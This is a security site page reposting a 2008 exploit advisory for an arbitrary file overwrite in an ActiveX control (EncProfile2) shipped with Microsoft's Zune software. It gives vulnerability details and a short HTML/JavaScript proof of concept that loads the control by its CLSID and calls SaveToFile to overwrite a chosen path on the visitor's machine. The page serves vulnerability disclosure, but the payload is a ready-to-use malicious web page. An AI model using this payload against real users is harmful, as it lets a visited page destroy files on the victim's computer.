首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zune Software ActiveX Arbitrary File Overwrite Exploit
来源:ilion Research Labs 作者:Mariani 发布时间:2008-04-24  
Vulnerability class : Arbitrary file overwrite
Discovery date : 21 April 2008
Remote : Yes
Credits : J. Bachmann & B. Mariani from ilion Research Labs
Vulnerable : Zune software: EncProfile2 Class

An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package.
If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.

POC:
<HTML>
<BODY>
<object id=ctrl classid="clsid:{0B1C3B47-207F-4CEA-8F31-34E4DB2F6EFD}"></object>
<SCRIPT>
function Do_it()
{
   File = "c:\\boot_.ini"
   ctrl.SaveToFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Web Calendar <= 4.1 Blind SQL
·YouTube Clone Script (spages.p
·RedDot CMS 7.5 (LngId) Remote
·又见0day! [FlashGet]-FG2CatchU
·Adobe Album Starter 3.2 Unchec
·DivX Player 6.7 SRT File Subti
·SubEdit Player build 4066 subt
·HP Software Update (Hpufunctio
·PHP-Fusion 6.00.307 Remote Bli
·VLC 0.8.6d httpd_FileCallBack
·OpenInvoice 0.9 Arbitrary Chan
·MS Windows XP SP2 (win32k.sys)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved